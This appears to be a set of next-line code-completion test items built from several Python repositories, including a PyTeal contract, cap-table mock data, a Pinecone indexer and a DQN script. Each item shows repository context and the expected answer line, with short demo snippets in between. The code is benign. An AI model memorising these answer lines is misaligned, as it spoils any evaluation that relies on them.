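extents = np.array([[-32., 32.], [-32., 32.], [-3., 2.]])
pc = np.array([[0.10, -0.30, -1.00],
               [5.00, 5.00, 0.00]])

# Same three steps as gen_voxel_indices_for_pc: discretize, shift by the minimum voxel, cast
discrete_pc = np.floor(pc / voxel_size).astype(np.int32)
min_voxel_coord = np.floor(extents.T[0] / voxel_size)
voxel_indices = (discrete_pc - min_voxel_coord).astype(int)
print(voxel_indices)  # rows: [128 126 5] and [148 148 8]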
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: c3exchange/c3-smartcontracts-v1
# Path: contracts_unified/library/c3types.py
class SignedInstrumentAmount(abi.NamedTuple):
class LiquidationFactors(abi.NamedTuple):
class InstrumentListElement(abi.NamedTuple):
class UserInstrumentData(abi.NamedTuple):
class OnChainOrderData(abi.NamedTuple):
class WormholeAddress(abi.NamedTuple):
class DecodedWormholePayload(abi.NamedTuple):
# Path: contracts_unified/library/constants.py
ADDRESS_SIZE = 32
# Path: contracts_unified/core/state_handler/global_handler.py
from typing import cast
from pyteal import (
ABIReturnSubroutine,
App,
Assert,
Btoi,
Bytes,
Expr,
Global,
Int,
Len,
MinBalance,
Pop,
Seq,
abi,
)
from contracts_unified.library.c3types import (
InstrumentId,
InstrumentListElement,
LiquidationFactors,
)
from contracts_unified.library.constants import ADDRESS_SIZE
@staticmethod
def set_pricecaster_id(pricecaster_id) -> Expr:
"""Sets the App id of the pricecaster"""
return App.globalPut(KEY_PRICECASTER_ID, Btoi(pricecaster_id))
@staticmethod
def get_wormhole_bridge_id() -> Expr:
"""Gets the App id of the wormhole bridge"""
return App.globalGet(KEY_WORMHOLE_BRIDGE_ID)
@staticmethod
def set_wormhole_bridge_id(wormhole_bridge_id) -> Expr:
"""Sets the App id of the wormhole bridge"""
return App.globalPut(KEY_WORMHOLE_BRIDGE_ID, Btoi(wormhole_bridge_id))
@staticmethod
@ABIReturnSubroutine
def set_address(key, address) -> Expr:
"""Sets an address in the global storage checking the length"""
return Seq(
Assert(Len(address) == Int(ADDRESS_SIZE)),
App.globalPut(key, address)
)
@staticmethod
def get_signature_validator() -> Expr:
"""Checks the address of the signature validator"""
return App.globalGet(KEY_SIGNATURE_VALIDATOR)
@staticmethod
def set_signature_validator(signature_validator) -> Expr:
"""Sets the address of the signature validator"""
return cast(Expr, GlobalStateHandler.set_address(KEY_SIGNATURE_VALIDATOR, signature_validator))
@staticmethod
def get_operator_address() -> Expr:
"""Gets the address of the operator"""
return App.globalGet(KEY_OPERATOR_ADDRESS)
@staticmethod
def set_operator_address(operator_address) -> Expr:
"""Sets the address of the operator"""
return cast(Expr, GlobalStateHandler.set_address(KEY_OPERATOR_ADDRESS, operator_address))
@staticmethod
def get_quant_address() -> Expr:
"""Gets the quant address"""
return App.globalGet(KEY_QUANT_ADDRESS)
@staticmethod
def set_quant_address(quant_address) -> Expr:
"""Sets the quant address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_QUANT_ADDRESS, quant_address))
@staticmethod
def get_fee_target() -> Expr:
"""Gets the fee target address"""
return App.globalGet(KEY_FEE_TARGET)
@staticmethod
def set_fee_target(fee_target_address) -> Expr:
"""Sets the fee target address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_FEE_TARGET, fee_target_address))
@staticmethod
def get_withdraw_buffer() -> Expr:
"""Gets the withdraw buffer address"""
return App.globalGet(KEY_WITHDRAW_BUFFER)
@staticmethod
def set_withdraw_buffer(withdraw_buffer) -> Expr:
"""Sets the withdraw buffer address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_WITHDRAW_BUFFER, withdraw_buffer))
@staticmethod
@ABIReturnSubroutine
def ensure_mbr_fund() -> Expr:
"""Ensures the current mbr is lower than the fund"""
return Assert(MinBalance(Global.current_application_address()) <= App.globalGet(KEY_MBR_FUND))
@staticmethod
def add_mbr_fund(mbr_fund) -> Expr:
"""Increments the mbr fund amount by an amount"""
return App.globalPut(KEY_MBR_FUND, App.globalGet(KEY_MBR_FUND) + mbr_fund)
@staticmethod
def get_liquidation_factors() -> Expr:
"""Gets the object representing the liquidation factors"""
return App.globalGet(KEY_LIQUIDATION_FACTORS)
@staticmethod
def set_liquidation_factors(factors) -> Expr:
"""Sets the global liquidation factors"""
factors_size = abi.make(LiquidationFactors).type_spec().byte_length_static()
return Seq(
Assert(Len(factors) == Int(factors_size)),
App.globalPut(KEY_LIQUIDATION_FACTORS, factors),
)
@staticmethod
@ABIReturnSubroutine
def get_instrument(
| instrument_id: InstrumentId, |
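The handler above is essentially pairs of App.globalGet/App.globalPut wrappers; a minimal PyTeal sketch of that pattern, with an illustrative key name that is not part of the c3 contracts:

from pyteal import App, Btoi, Bytes, Expr

KEY_DEMO_ID = Bytes("demo_id")

def set_demo_id(demo_id) -> Expr:
    # Decode the raw byte argument to a uint64 before storing it
    return App.globalPut(KEY_DEMO_ID, Btoi(demo_id))

def get_demo_id() -> Expr:
    return App.globalGet(KEY_DEMO_ID)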
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: gunderson-dettmer/CE2OCF
# Path: CE2OCF/ocf/mocks/company.py
def fake_phone_number() -> str:
"""
Generates a valid US phone number with the international calling code.
The format is +1 (XXX) XXX-XXXX, with the following rules for the area code:
1. The first digit cannot be 0 or 1.
2. The second digit cannot be 9.
3. The second and third digits cannot both be 0.
Returns:
str: A valid US phone number with international calling code.
"""
# Define the range for the first digit of area code (2-9)
first_digit = random.randint(2, 9)
# Define the range for the second and third digits of area code
# The second digit cannot be 9, and the (second, third) cannot be (0, 0)
while True:
second_digit = random.randint(0, 8)
third_digit = random.randint(0, 9)
if not (second_digit == 0 and third_digit == 0):
break
# Generate the seven digits following the area code
# The first digit of these seven digits cannot be 0 or 1 either.
second_set_first_digit = random.randint(2, 9)
remaining_six_digits = random.randint(0, 999999)
# Combine all parts to create the phone number
phone_number = f"+1 ({first_digit}{second_digit}{third_digit}) {second_set_first_digit}{remaining_six_digits:06d}"
return phone_number
# Path: CE2OCF/types/enums.py
class DoubleTriggerTypesEnum(str, enum.Enum):
NA = "N/A"
TWENTY_FIVE_PERCENT_12_MONTHS = "25% of unvested; Involuntary Termination within 12 months after CiC"
FIFTY_PERCENT_12_MONTHS = "50% of unvested; Involuntary Termination within 12 months after CiC"
ONE_HUNDRED_PERCENT_12_MONTHS = "100% of unvested; Involuntary Termination within 12 months after CiC"
TWENTY_FIVE_PERCENT_ANY_TIME = "25% of unvested; Involuntary Termination any time after CiC"
FIFTY_PERCENT_ANY_TIME = "50% of unvested; Involuntary Termination any time after CiC"
ONE_HUNDRED_PERCENT_ANY_TIME = "100% of unvested; Involuntary Termination any time after CiC"
CUSTOM = "Custom"
# Path: CE2OCF/types/enums.py
class PaidWithOptionsEnum(str, enum.Enum):
IP = "IP"
CASH = "Cash"
# Path: CE2OCF/types/enums.py
class SingleTriggerTypesEnum(str, enum.Enum):
NA = "N/A"
SIX_MONTHS_ALL_TIMES = "6 months; all times after CiC"
TWELVE_MONTHS_ALL_TIMES = "12 months; all times after CiC"
TWENTY_FOUR_MONTHS_ALL_TIMES = "24 months; all times after CiC"
ONE_HUNDRED_PERCENT_ALL_TIMES = "100%; all times after CiC"
SIX_MONTHS_INVOLUNTARY_TERMINATION = "6 months; Involuntary Termination"
TWELVE_MONTHS_INVOLUNTARY_TERMINATION = "12 months; Involuntary Termination"
TWENTY_FOUR_MONTHS_INVOLUNTARY_TERMINATION = "24 months; Involuntary Termination"
ONE_HUNDRED_PERCENT_INVOLUNTARY_TERMINATION = "100%; Involuntary Termination"
CUSTOM = "Custom"
# Path: CE2OCF/types/enums.py
class VestingTypesEnum(str, enum.Enum):
FOUR_YR_1_YR_CLIFF = "4yr with 1yr Cliff"
FOUR_YR_NO_CLIFF = "4yr with no Cliff"
FULLY_VESTED = "Fully Vested"
CUSTOM = "Custom" # We're not going to support this via OCF
# Path: CE2OCF/types/models.py
class Stockholder(BaseModel):
id: str
DoubleTrigger: DoubleTriggerTypesEnum
# our answer will appear below the general description entered above. If no additional language is necessary,
# skip this field
DescriptionAssignedTechnology: Optional[str]
# The description should provide clarity regarding exactly what property is being transferred while being neither
# too narrow nor too broad.
BroadDescriptionAssignedTechnology: str
EmailAddress: str
FFPreferredShares: Optional[
int
] = None # If founder preferred is authorized for company AND we want to give this stockholder some,
# how many shares do they get?
PaidWith: PaidWithOptionsEnum
PhoneNumber: str
SingleTrigger: SingleTriggerTypesEnum
Shares: int
SSN: str
Stockholder: str = Field(
default_factory=lambda: uuid.uuid4().__str__()
) # Name of stockholder goes here BUT we're using uuid to be able filter objs by name and have guaranteed
# uniques. Required for tests.
StockholderCity: str
StockholderState: str
StockholderStreet: str
StockholderZip: str
VCD: str
Vesting: VestingTypesEnum
# Path: CE2OCF/ocf/mocks/stockholders.py
import random
import uuid
from faker import Faker
from CE2OCF.ocf.mocks.company import fake_phone_number
from CE2OCF.types.enums import (
DoubleTriggerTypesEnum,
PaidWithOptionsEnum,
SingleTriggerTypesEnum,
VestingTypesEnum,
)
from CE2OCF.types.models import Stockholder
fake = Faker()
def sum_shares(stockholder_list: list[Stockholder]) -> tuple[int, int]:
total_FFPreferredShares = 0
total_Shares = 0
for stockholder in stockholder_list:
if stockholder.FFPreferredShares is not None:
total_FFPreferredShares += stockholder.FFPreferredShares
if stockholder.Shares is not None:
total_Shares += stockholder.Shares # if Shares are floats, replace with `float(stockholder.Shares)`
return total_FFPreferredShares, total_Shares
def mock_stockholder() -> Stockholder:
return Stockholder(
id=uuid.uuid4().__str__(),
| DoubleTrigger=random.choice(list(DoubleTriggerTypesEnum)), |
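mock_stockholder fills the remaining fields the same way: random.choice over the enum members plus faker-generated values. A self-contained sketch of that idiom with a stand-in enum (the repo's enums are shown above but not importable here):

import enum
import random

class VestingDemo(str, enum.Enum):
    FOUR_YR_1_YR_CLIFF = "4yr with 1yr Cliff"
    FULLY_VESTED = "Fully Vested"

# random.choice needs a sequence, so materialize the enum members first
picked = random.choice(list(VestingDemo))
print(picked.value)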
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Hellohistory/EbookDataRename.py
# Path: model/database_handler.py
def queryDatabaseForFileNames(db_folder_path, folder_path, tableWidget):
try:
db_files = get_files_from_directory(db_folder_path, recursive=True)
db_files = [f for f in db_files if f.endswith('.db')]
files = get_files_from_directory(folder_path, recursive=True)
tableWidget.setRowCount(len(files))
found_ss_codes = set()
for row, file_path in enumerate(files):
QApplication.processEvents()
file_name = os.path.basename(file_path)
match = re.search(r'\d{8}', file_name)
ss_code = match.group() if match else None
if ss_code and ss_code not in found_ss_codes:
for db_file in db_files:
connection = sqlite3.connect(db_file)
title = query_title_from_database(connection, ss_code)
connection.close()
if title != "无此列":
tableWidget.setItem(row, 1, QTableWidgetItem(title))
found_ss_codes.add(ss_code)
break
else:
tableWidget.setItem(row, 1, QTableWidgetItem("无此列"))
else:
message = "已找到记录" if ss_code in found_ss_codes else "无效的 SS_code"
tableWidget.setItem(row, 1, QTableWidgetItem(message))
tableWidget.setItem(row, 0, QTableWidgetItem(file_path))
tableWidget.setItem(row, 2, QTableWidgetItem("待处理"))
except Exception as e:
print("发生错误:", str(e))
# Path: model/file_handler.py
def get_files_from_directory(directory_path, recursive=False):
file_list = []
if recursive:
for root, dirs, files in os.walk(directory_path):
for file in files:
file_list.append(os.path.join(root, file))
else:
file_list = [os.path.join(directory_path, file) for file in os.listdir(directory_path) if
os.path.isfile(os.path.join(directory_path, file))]
return file_list
# Path: model/rename_handler.py
def startRenamingFiles(tableWidget, progressBar, changeExtensionCheckBox, traditionalSimplifiedCheckBox):
total_files = tableWidget.rowCount()
progressBar.setValue(0)
cc = OpenCC('s2t')
for row in range(total_files):
original_file = tableWidget.item(row, 0).text()
new_name = tableWidget.item(row, 1).text()
if traditionalSimplifiedCheckBox.isChecked():
new_name = cc.convert(new_name)
original_extension = os.path.splitext(original_file)[1]
if changeExtensionCheckBox.isChecked() and original_extension.lower() == ".uvz":
new_extension = ".zip"
else:
new_extension = original_extension
new_file = os.path.join(os.path.dirname(original_file), os.path.splitext(new_name)[0] + new_extension)
try:
os.rename(original_file, new_file)
tableWidget.setItem(row, 2, QTableWidgetItem("重命名成功"))
except Exception as e:
tableWidget.setItem(row, 2, QTableWidgetItem(f"错误: {e}"))
progressBar.setValue(int((row + 1) / total_files * 100))
progressBar.setValue(100)
# Path: main.py
import sys
from PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QVBoxLayout, QHBoxLayout,
QPushButton, QLineEdit, QProgressBar, QTableWidget,
QRadioButton, QCheckBox, QFileDialog, QTableWidgetItem)
from PyQt5.QtCore import QSize
from opencc import OpenCC
from model.database_handler import queryDatabaseForFileNames
from model.file_handler import get_files_from_directory
from model.rename_handler import startRenamingFiles
class MainGUI(QMainWindow):
def __init__(self):
super().__init__()
self.cc = OpenCC('s2t')
self.original_names = {}
self.initUI()
def applyTraditionalSimplifiedConversion(self):
total_rows = self.tableWidget.rowCount()
for row in range(total_rows):
original_text_item = self.tableWidget.item(row, 1)
if original_text_item:
if self.traditionalSimplifiedCheckBox.isChecked():
if row not in self.original_names:
self.original_names[row] = original_text_item.text()
converted_text = self.cc.convert(self.original_names[row])
self.tableWidget.setItem(row, 1, QTableWidgetItem(converted_text))
else:
if row in self.original_names:
self.tableWidget.setItem(row, 1, QTableWidgetItem(self.original_names[row]))
def initUI(self):
self.setWindowTitle('EbookDataRename V0.0.1')
self.setMinimumSize(QSize(800, 600))
centralWidget = QWidget(self)
self.setCentralWidget(centralWidget)
mainLayout = QVBoxLayout(centralWidget)
self.setupLayout(mainLayout)
self.applyMaterialDesignStyle()
def initiateDatabaseQuery(self):
db_path = self.local_db_lineedit.text()
folder_path = self.targetFolderLineEdit.text()
| queryDatabaseForFileNames(db_path, folder_path, self.tableWidget) |
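The SS_code lookup in queryDatabaseForFileNames hinges on one regex call; a tiny standalone check of that extraction (the file name is invented):

import re

file_name = "12345678_some_book.uvz"
match = re.search(r'\d{8}', file_name)
ss_code = match.group() if match else None
print(ss_code)  # 12345678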
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: fleet-ai/code-pilot
# Path: utils/utils.py
def batch(iterable, n=1):
l = len(iterable)
for ndx in range(0, l, n):
yield iterable[ndx : min(ndx + n, l)]
# Path: constants.py
INDEX_NAME = "" # TODO add
# Path: constants.py
INDEX_ENVIRONMENT = "" # TODO add
# Path: constants.py
NAMESPACE = "" # TODO add
# Path: constants.py
PATH_TO_SRC_CODE = "src_code/" # OPTIONAL modify -- must start with src_code/
# Path: code_indexer.py
class CodeIndexer:
src_dir: str
target_chunk_tokens: int
max_chunk_tokens: int
enforce_max_chunk_tokens: bool
token_model: str
code_splitters = {}
hash_cache = {}
index = None
def __init__(
self,
src_dir: str,
target_chunk_tokens: int = 300,
max_chunk_tokens: int = 1000,
enforce_max_chunk_tokens: bool = False,
coalesce: int = 50,
token_model: str = "gpt-4",
):
self.src_dir = src_dir
self.target_chunk_tokens = target_chunk_tokens
self.max_chunk_tokens = max_chunk_tokens
self.enforce_max_chunk_tokens = enforce_max_chunk_tokens
self.coalesce = coalesce
self.token_model = token_model
self._create_index()
self.refresh_nodes()
def add_file(self, file: str):
ext = os.path.splitext(file)[1]
text_splitter = self._get_code_splitter(ext)
with open(file, "r", encoding="utf-8") as f:
text = f.read()
chunks = text_splitter.split_text(text)
chunks = [
{
"id": str(uuid.uuid4()),
"text": chunk,
"file": file.split("/src_code/", 1)[1]
if "/src_code/" in file
else file,
}
for chunk in chunks
]
self.embed_and_upsert_code_chunks(chunks)
def refresh_nodes(self):
files = self._find_files(self.src_dir, EXTENSION_TO_TREE_SITTER_LANGUAGE)
# For each file, split into chunks and index
for file in files:
self.add_file(str(file))
def _find_files(self, path, include_ext={}):
"""
Recursively find all files in a given path.
Parameters:
path (str): The root directory to start searching from.
include_ext (dict): A dictionary of file extensions to include
(keys are extensions including leading period if applicable).
Returns:
list: A list of full file paths for each file found.
"""
# Convert path to an absolute path
path = os.path.abspath(path)
found_files = []
for root, _, files in os.walk(path):
for file in files:
# Check if the file should be excluded based on its extension
file_ext = os.path.splitext(file)[1]
if file_ext in include_ext:
# Construct the full path of the file and append to list
full_path = Path(os.path.join(root, file)).resolve()
found_files.append(full_path)
return set(found_files)
def _get_code_splitter(self, ext) -> CodeSplitter:
if ext not in EXTENSION_TO_TREE_SITTER_LANGUAGE:
raise ValueError(f"Extension {ext} not supported.")
language = EXTENSION_TO_TREE_SITTER_LANGUAGE[ext]
if language not in self.code_splitters:
text_splitter = CodeSplitter(
language=language,
target_chunk_tokens=self.target_chunk_tokens,
max_chunk_tokens=self.max_chunk_tokens,
enforce_max_chunk_tokens=self.enforce_max_chunk_tokens,
coalesce=self.coalesce,
token_model=self.token_model,
)
self.code_splitters[ext] = text_splitter
return self.code_splitters[ext]
def _create_index(self):
pinecone.init(api_key=PINECONE_API_KEY, environment=INDEX_ENVIRONMENT)
pinecone_index = pinecone.Index(INDEX_NAME)
self.index = pinecone_index
return pinecone_index
def embed_and_upsert_code_chunks(self, chunks):
vectors = []
embeddings = embed_code_chunks(
chunks,
model=EMBEDDINGS_MODEL,
token_limit=MAX_CONTEXT_LENGTH_EMBEDDINGS,
)
for chunk, embedding in zip(chunks, embeddings):
metadata = {
"id": chunk["id"],
"text": chunk["text"],
"file": chunk["file"],
"type": "code",
}
vectors.append(
{
"id": str(uuid.uuid4()),
"values": embedding,
"metadata": metadata,
}
)
for vec_batch in batch(vectors, 100):
self.index.upsert(vectors=vec_batch, namespace=NAMESPACE)
print("Finished embedding chunk(s).")
# Path: scripts.py
import os
import argparse
import pinecone
from dotenv import load_dotenv
from context import download_embeddings
from utils.utils import batch
from constants import (
INDEX_NAME,
INDEX_ENVIRONMENT,
NAMESPACE,
PATH_TO_SRC_CODE,
)
from code_indexer import CodeIndexer
load_dotenv()
PINECONE_API_KEY = os.getenv("PINECONE_API_KEY")
pinecone.init(api_key=PINECONE_API_KEY, environment=INDEX_ENVIRONMENT)
index = pinecone.Index(INDEX_NAME)
def read_and_upsert(library_name):
df = download_embeddings(library_name)
def convert_row_to_dict(row):
return {
"id": row["id"],
"values": [float(value) for value in row["dense_embeddings"]],
"sparse_values": dict(row["sparse_values"]),
"metadata": {**dict(row["metadata"]), "type": "documentation"},
}
df["dict"] = df.apply(convert_row_to_dict, axis=1)
vectors = df["dict"].tolist()
vec_batches = list(batch(vectors, 100))
for idx, vec_batch in enumerate(vec_batches):
print(f"Upserting batch {idx}/{len(vec_batches)}...")
index.upsert(vectors=vec_batch, namespace=NAMESPACE)
print("Finished upserting")
def read_and_upsert_source_code():
| _ = CodeIndexer(src_dir=PATH_TO_SRC_CODE) |
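The batch() helper that paces the Pinecone upserts just slices a sequence into fixed-size chunks; re-declared verbatim from utils/utils.py above so the demonstration runs standalone:

def batch(iterable, n=1):
    l = len(iterable)
    for ndx in range(0, l, n):
        yield iterable[ndx : min(ndx + n, l)]

for chunk in batch(list(range(7)), 3):
    print(chunk)  # [0, 1, 2], then [3, 4, 5], then [6]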
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: bithuanglq/APF_RL
# Path: gym_examples/wrappers/relative_position.py
class RelativePosition(gym.ObservationWrapper):
def __init__(self, env):
super().__init__(env)
self.observation_space = spaces.Box(shape=(2+25*6,), low=-np.inf, high=np.inf)
def observation(self, obs):
return np.concatenate((obs["target"] - obs["agent"], obs["loc_obs"]), axis=0) # (2+25*6,)
# Path: prioritized_memory.py
class Memory: # stored as ( s, a, r, s_ ) in SumTree
e = 0.01
a = 0.6
beta = 0.4
beta_increment_per_sampling = 0.001
def __init__(self, capacity):
self.tree = SumTree(capacity)
self.capacity = capacity
def _get_priority(self, error):
return (np.abs(error) + self.e) ** self.a
def add(self, error, sample):
p = self._get_priority(error)
self.tree.add(p, sample)
def sample(self, n):
batch = []
idxs = []
segment = self.tree.total() / n
priorities = []
self.beta = np.min([1., self.beta + self.beta_increment_per_sampling])
for i in range(n):
a = segment * i
b = segment * (i + 1)
s = random.uniform(a, b)
(idx, p, data) = self.tree.get(s)
priorities.append(p)
batch.append(data)
idxs.append(idx)
sampling_probabilities = priorities / self.tree.total()
is_weight = np.power(self.tree.n_entries * sampling_probabilities, -self.beta)
is_weight /= is_weight.max()
return batch, idxs, is_weight
def update(self, idx, error):
p = self._get_priority(error)
self.tree.update(idx, p)
# Path: DQN_variant.py
import argparse
import os
import random
import time
import gym
import numpy as np
import tensorflow as tf
import tensorlayer as tl
from tqdm import tqdm
from gym_examples.wrappers import RelativePosition
from prioritized_memory import Memory
''' Debugging notes
1. Version compatibility:
https://medium.com/mlearning-ai/how-to-install-tensorflow-2-x-with-cuda-and-cudnn-on-ubuntu-20-04-lts-b73c209d8e88
2. Use save_npz_dict to save the model instead of save_npz; likewise when loading
3. Replacing part of the random exploration with APF works much better
4. Added PER (https://blog.csdn.net/abcdefg90876/article/details/106270925); the Original Replay Buffer alone also works
5. Hyperparameters are collected in the "hyper parameters" section
'''
'''
GridWorld-v0:
@Action -- 0 right, 1 up, 2 left, 3 down
@Observation -- {[x1, y1], [x2, y2], 25 vector(6,)}, agent_loc, target_loc and surrounding states.
@Info -- distance between agent and target
'''
parser = argparse.ArgumentParser()
parser.add_argument('--mode', help='train or test', default='train')
parser.add_argument(
    '--save_path', default='dqn_variants', help='folder to save to if mode == train, else the model path; '
    'the Q-network is saved each time the target network updates'
)
parser.add_argument('--seed', help='random seed', type=int, default=0)
parser.add_argument('--noisy_scale', type=float, default=1e-2)
parser.add_argument('--disable_double', action='store_false', default=True)
parser.add_argument('--disable_dueling', action='store_false', default=False)
args = parser.parse_args()
if args.mode == 'train':
os.makedirs(args.save_path, exist_ok=True)
random.seed(args.seed)
np.random.seed(args.seed)
tf.random.set_seed(args.seed) # reproducible
noise_scale = args.noisy_scale
double = not args.disable_double
dueling = not args.disable_dueling
env = gym.make('gym_examples/GridWorld-v0', render_mode='human')
| env = RelativePosition(env) # refer to gym_examples/wrappers/relative_position.py, observation space has changed! |
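A compact numpy sketch of the proportional sampling and importance-sampling weights that Memory implements on top of a SumTree (flat arrays here so it stays self-contained; the priorities are made up):

import numpy as np

rng = np.random.default_rng(0)
priorities = np.array([0.5, 1.0, 3.0, 0.1])
probs = priorities / priorities.sum()

# Same weight formula as Memory.sample: (N * P(i)) ** -beta, normalized by the max
beta = 0.4
idxs = rng.choice(len(priorities), size=2, p=probs)
is_weight = (len(priorities) * probs[idxs]) ** (-beta)
is_weight /= is_weight.max()
print(idxs, is_weight)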
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: ehennenfent/live_illustrate
# Path: live_illustrate/util.py
class AsyncThread:
"""Generic thread that has a work queue and a callback to run on the result"""
SLEEP_TIME = 0.25
MAX_ERRORS = 5
def __init__(self, logger_name="AsyncThread") -> None:
self.queue: Queue[t.Any] = Queue()
self._consecutive_errors: int = 0
self.logger = logging.getLogger(logger_name)
@abstractmethod
def work(self, *args) -> t.Any:
raise NotImplementedError()
def start(self, callback) -> None:
while True:
if not self.queue.empty():
try:
callback(self.work(*self.queue.get()))
self._consecutive_errors = 0
except Exception as e:
self._consecutive_errors += 1
self.logger.error(e)
if self._consecutive_errors > self.MAX_ERRORS:
self.logger.critical("Abandoning execution after %d consecutive errors", self.MAX_ERRORS)
exit(-1)
sleep(self.SLEEP_TIME)
def send(self, *args) -> None:
self.queue.put(args)
# Path: live_illustrate/util.py
class Summary(Transcription):
summary: str
@classmethod
def from_transcription(cls, transcription: Transcription, summary: str) -> "Summary":
return cls(transcription.transcription, summary)
# Path: live_illustrate/util.py
class Transcription:
transcription: str
# Path: live_illustrate/util.py
@lru_cache(maxsize=2)
def num_tokens_from_string(string: str, encoding_name: str = "cl100k_base") -> int:
"""Use OpenAI's tokenizer to count the number of tokens"""
encoding = tiktoken.get_encoding(encoding_name)
num_tokens = len(encoding.encode(string))
return num_tokens
# Path: live_illustrate/summarize.py
from datetime import datetime
from openai import OpenAI
from .util import AsyncThread, Summary, Transcription, num_tokens_from_string
SYSTEM_PROMPT = "You are a helpful assistant that describes scenes to an artist who wants to draw them. \
You will be given several lines of dialogue that contain details about the physical surroundings of the characters. \
Your job is to summarize the details of the scene in a bulleted list containing 4-7 bullet points. \
If there is more than one scene described by the dialog, summarize only the most recent one. \
Remember to be concise and not include details that cannot be seen." # Not so good about this last bit, eh?
class TextSummarizer(AsyncThread):
def __init__(self, model: str) -> None:
super().__init__("TextSummarizer")
self.openai_client: OpenAI = OpenAI()
self.model: str = model
def work(self, transcription: Transcription) -> Summary | None:
"""Sends the big buffer of provided text to ChatGPT, returns bullets describing the setting"""
text = transcription.transcription
| if (token_count := num_tokens_from_string(text)) == 0: |
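num_tokens_from_string is a thin wrapper over tiktoken, so the token-count guard above reduces to one encode call; a standalone sketch (assuming tiktoken is installed, with an invented input string):

import tiktoken

encoding = tiktoken.get_encoding("cl100k_base")
text = "The party enters a torch-lit stone hall."
print(len(encoding.encode(text)))  # the count compared against 0 in work()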
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: cyberark/ark-sdk-python
# Path: ark_sdk_python/models/common/ark_protocol_type.py
class ArkProtocolType(str, MultiValueEnum):
SSH = 'ssh', 'SSH'
SCP = 'scp', 'SCP'
SFTP = 'sftp', 'SFTP'
RDP = 'rdp', 'RDP'
CLI = 'cli', 'CLI'
CONSOLE = 'console', 'Console'
HTTPS = 'https', 'HTTPS'
K8S = 'K8S', 'k8s'
DB = 'Database', 'database', 'DATABASE'
# Path: ark_sdk_python/models/common/ark_workspace_type.py
class ArkWorkspaceType(str, MultiValueEnum):
AWS = 'aws', 'AWS', 'Aws'
AZURE = 'azure', 'AZURE', 'Azure'
ONPREM = 'onprem', 'ON-PREMISE', 'OnPrem'
DB = 'db', 'DATABASES', 'Databases'
GCP = 'gcp', 'GCP'
MYSQL = 'mysql', 'MySQL'
MARIADB = 'mariadb', 'MariaDB'
MSSQL = 'mssql', 'MSSQL'
ORACLE = 'oracle', 'Oracle'
POSTGRES = 'postgres', 'Postgres'
FAULT = 'fault', 'FAULT'
UNKNOWN = 'unknown', 'UNKNOWN', 'Unknown'
# Path: ark_sdk_python/models/services/dpa/policies/common/ark_dpa_base_authorization_rule.py
class ArkDPABaseAuthorizationRule(ArkCamelizedModel):
rule_name: str = Field(description='Name of the rule')
user_data: ArkDPAUserData = Field(description='User data related information of the rule')
# Path: ark_sdk_python/models/services/dpa/policies/common/ark_dpa_base_connection_information.py
class ArkDPABaseConnectionInformation(ArkCamelizedModel):
days_of_week: Optional[List[ArkDPADaysOfWeek]] = Field(
description='Days of week this rule is allowed on', default=['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
)
full_days: Optional[bool] = Field(description='Whether this rule is allowed for the entirety of the week', default=False)
hours_from: Optional[str] = Field(description='From which hours this rule is allowed')
hours_to: Optional[str] = Field(description='To which hours this rule is allowed')
time_zone: Optional[Union[Dict, str]] = Field(description='Timezone in which the hours apply to')
grant_access: conint(gt=0, le=24) = Field(description='For how many hours to grant access in this rule in hours', default=2)
idle_time: Optional[conint(gt=0, le=120)] = Field(
description='How long the session can stay idle until stopped in minutes', default=None
)
# Path: ark_sdk_python/models/services/dpa/policies/vm/ark_dpa_vm_connection_data.py
class ArkDPAVMConnectionMethodData(ArkCamelizedModel):
class ArkDPAVMLocalEphemeralUserConnectionMethodData(ArkDPAVMConnectionMethodData):
class ArkDPAVMRDPLocalEphemeralUserConnectionData(ArkCamelizedModel):
# Path: ark_sdk_python/models/services/dpa/policies/vm/ark_dpa_vm_authorization_rule.py
from pydantic import Field, validator
from ark_sdk_python.models.common import ArkProtocolType
from ark_sdk_python.models.common.ark_workspace_type import ArkWorkspaceType
from ark_sdk_python.models.services.dpa.policies.common.ark_dpa_base_authorization_rule import ArkDPABaseAuthorizationRule
from ark_sdk_python.models.services.dpa.policies.common.ark_dpa_base_connection_information import ArkDPABaseConnectionInformation
from ark_sdk_python.models.services.dpa.policies.vm.ark_dpa_vm_connection_data import ArkDPAVMProvidersConnectionDict
class ArkDPAVMConnectionInformation(ArkDPABaseConnectionInformation):
connect_as: ArkDPAVMProvidersConnectionDict = Field(description='In which fashion the connection is made')
# pylint: disable=no-self-use,no-self-argument
@validator('connect_as')
def validate_connect_as(cls, val):
for k, v in val.items():
| if ArkWorkspaceType(k) not in [ArkWorkspaceType.AWS, ArkWorkspaceType.AZURE, ArkWorkspaceType.GCP, ArkWorkspaceType.ONPREM]: |
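The validator works because a MultiValueEnum resolves any listed alias to one canonical member; a standalone illustration using aenum, which these multi-valued enums appear to build on:

from aenum import MultiValueEnum

class WorkspaceDemo(str, MultiValueEnum):
    AWS = 'aws', 'AWS', 'Aws'
    AZURE = 'azure', 'AZURE', 'Azure'

# Every alias maps back to the same member, so membership tests are canonical
print(WorkspaceDemo('AWS') is WorkspaceDemo.AWS)                           # True
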